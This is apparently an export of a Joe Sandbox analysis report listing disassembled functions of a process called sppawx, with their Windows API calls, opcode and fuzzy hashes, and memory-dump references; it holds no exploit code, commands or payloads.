Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: b07bad99604f84b8c779a92eeb66fd4874df6644f4aadefcc57f7713f9911625
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: C4311721E0E24256FA74FB7594A23B9B791AF42384FC408BDE94E472D7DE2CA815C271

Function 00007FF79A3201AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3201F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3202E7

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: d8b417cf92a97ddbce5fa69e19d74c33bcd8ac60ee2922ea736eb7179b7db9aa
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 6D51E661B0B24296F738BE36940067AF291AF46BA4F94477DEE6C437C5CF3CE9058620

Function 00007FF79A32C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF79A32C33D), ref: 00007FF79A32C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF79A32C33D), ref: 00007FF79A32C1FA

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 82133781b8d66feb67c9cea04e4113c02db0436d525814eb16ac41e1d313143c
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: BA110161A09B8181EA20AB35B814069F361BB81BF0F94437DEE7D4B7E8CF3CE0018700

Function 00007FFEDD27466C Relevance: 3.0, APIs: 2, Instructions: 34networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFEDD2746A5
WSAGetLastError.WS2_32 ref: 00007FFEDD2746C2

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: ErrorLastioctlsocket
String ID:
API String ID: 1021210092-0
Opcode ID: 9aec870b7f4277573dccf07976260460dc8d1da0e11b64ac9c67637333db84d1
Instruction ID: f2042d900a213fbf224f5f11ee41ee276ace5714784d2a18a09f13d238c94f76
Opcode Fuzzy Hash: 9aec870b7f4277573dccf07976260460dc8d1da0e11b64ac9c67637333db84d1
Instruction Fuzzy Hash: 71012131B18B5192E7309B66E45406D63A4FFC8BA0B584032E95E43F74EE2CD4958700

Function 00007FFEDD2752F4 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FFEDD275324
00007FFEFBBC3440.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFEDD27533E

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: 00007C3440closesocket
String ID:
API String ID: 1307566658-0
Opcode ID: 1931c6510799572867503be09faf9a3a2bbe64411395d295934daa13077f4281
Instruction ID: 06ed158067d6a789fc8d8ee90baa3430b98c39417f1a09ed0cb95640bbd46cbe
Opcode Fuzzy Hash: 1931c6510799572867503be09faf9a3a2bbe64411395d295934daa13077f4281
Instruction Fuzzy Hash: 02F01D21A08B5192E6745B65A84406C6360EF89BB0B1C0736DA7A03FF4EF7CD486C700

Function 00007FF79A32A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: aca873f911cabe20a60e08cdb733db224169bb6a783f222007ff70efc026313b
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: E0E08610F1F60653FF347BB2A855138B150AF84740FC540BDDC1D822A1DE2C68858330

Function 00007FF79A32ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF79A32AA45,?,?,00000000,00007FF79A32AAFA), ref: 00007FF79A32AC36
GetLastError.KERNEL32(?,?,?,00007FF79A32AA45,?,?,00000000,00007FF79A32AAFA), ref: 00007FF79A32AC40

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 1d7509ee1532f1454ecd7224329401a4908d6d84c1a43419871d158657c5c943
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: B9218411F2E64243FEB47775A554279B6829F84790FC842BDDE1E873D5CE6CE4458320

Function 00007FF79A32BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32BF44

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: ad9ec76264aea28935b10350e32ed3fb3e8805d39d2e7803bda3676b644f2c5b
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 9041D43291A20187FA34AF35A545279F3A0FB55B44F90417EDF8E83691CF2DE402CB61

Function 00007FF79A317F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF79A31802A

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: a7520e828596113b268e63b2d981a6b665d81183b45f3f30672e017b73aefd71
Instruction ID: 6bfb71484e6a1b8d4f838adcb1625fb6a13e43a7fa028ee07bbe339bd4c1f22f
Opcode Fuzzy Hash: a7520e828596113b268e63b2d981a6b665d81183b45f3f30672e017b73aefd71
Instruction Fuzzy Hash: 9721B121B0A65696FA20FA3265043BAF651BF46BC4FCC547CEE4D07786CE3DE0468724

Function 00007FF79A32B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32BA32

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction ID: 6b8bf6177bb9be6ffb9c968d0fcd6f2a0594761ba53678f265a9d87e9241a1d8
Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction Fuzzy Hash: D1316E21A1A65286F7617F75884537CBA60AB80B94FD202BEEE6D033D2DF7CE4418731

Function 00007FF79A326004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A325F69

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 67f9aabfb1a49d3fd99ff180013b838c2008757056d4f7a47f9ebaafc666cf7b
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: D0115122A1E64292FA70BF61940127EF264AF85B80FC440BEEF4C57E96DF3DD6408760

Function 00007FF79A3363C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3363E7

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 9271a2c0a03025514c4abb32fe168842053f75dfb0eee4508278956e07317af4
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: BF219872E1D6818AEB759F28D44137AB660EB84B54F94427CEA5D476D5DF3CD4008B10

Function 00007FF79A32042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A320480

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 6bd280a2834a2043cdb1af0ed4d72567760e637bd3f66531c0926c4d58f631f1
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 5601A561A0974141F924EF725902169F691AF86FE0F88867DDE5C17BD6CE3CE5018710

Function 00007FFEDD276854 Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFEDD276884

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: ac58c37e6a9bad275b34c174a9077f6f6585450ef7728dd028fc21ce204cc036
Instruction ID: 5a9b040caac1a9b7c6df8615105e2206ca7f25b449f4925054a628484d3e3271
Opcode Fuzzy Hash: ac58c37e6a9bad275b34c174a9077f6f6585450ef7728dd028fc21ce204cc036
Instruction Fuzzy Hash: BBE01AB1B0464582DB689B1AE59123963A0F748FB5F245736DE3D8B7E0DE28D8E1C340

Function 00007FF79A319070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439

LoadLibraryExW.KERNEL32(?,00007FF79A316466,?,00007FF79A31336E), ref: 00007FF79A319092

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
Instruction ID: 97f60f9a3af0d094e4784d7733e1e7ca651f193ff6de1abbe1d22fdfc488a427
Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
Instruction Fuzzy Hash: E3D08C11F2965541FA64FB77BA4A669A251ABCDBC0EC8C03DEE0D03B5ADC3CC0414B00

Function 00007FFEDCBFF3F0 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FFEDCBFF31B), ref: 00007FFEDCBFF421

Memory Dump Source

Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true

Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
Instruction ID: ac616f82f0b05348264606613aba7e84a8842b7cf62429b4046384087ec83dc3
Opcode Fuzzy Hash: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
Instruction Fuzzy Hash: 5821813260879087D354DF26E98025EB7A5FB88BD4F584526EB8847F69CF3CE456CB04

Function 00007FF79A32EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF79A32B39A,?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA), ref: 00007FF79A32EC5D

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: 89a893273a7edb4baca4a044127127f6ccb7cfc2c244ccaf4da8dc15a3e0f0c9
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: 4EF04F50B0B61640FE747AB254922B5B6905FC4B84FDC54BCCD0E462D1DE2CA4808230

Function 00007FF79A32D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF79A320D00,?,?,?,00007FF79A32236A,?,?,?,?,?,00007FF79A323B59), ref: 00007FF79A32D6AA

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 43981e17545ad3b6d0ad05ae6b51d6c06c424fea9fa29da47af638cf7ef42113
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 01F03410E0F20244FEB47AB259512B8B2908F94BE0FC902BCAC2E856C2DE2CA4808230

Non-executed Functions

Function 00007FF79A318BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318C46

Part of subcall function 00007FF79A32A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32A500

Part of subcall function 00007FF79A32878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3287F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318CD6
CreateProcessW.KERNEL32 ref: 00007FF79A318D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318D18

Part of subcall function 00007FF79A312C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
Part of subcall function 00007FF79A312C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
Part of subcall function 00007FF79A312C50: MessageBoxW.USER32 ref: 00007FF79A312D99

RegisterClassW.USER32 ref: 00007FF79A318D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318D7B
CreateWindowExW.USER32 ref: 00007FF79A318DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E05
PeekMessageW.USER32 ref: 00007FF79A318E29
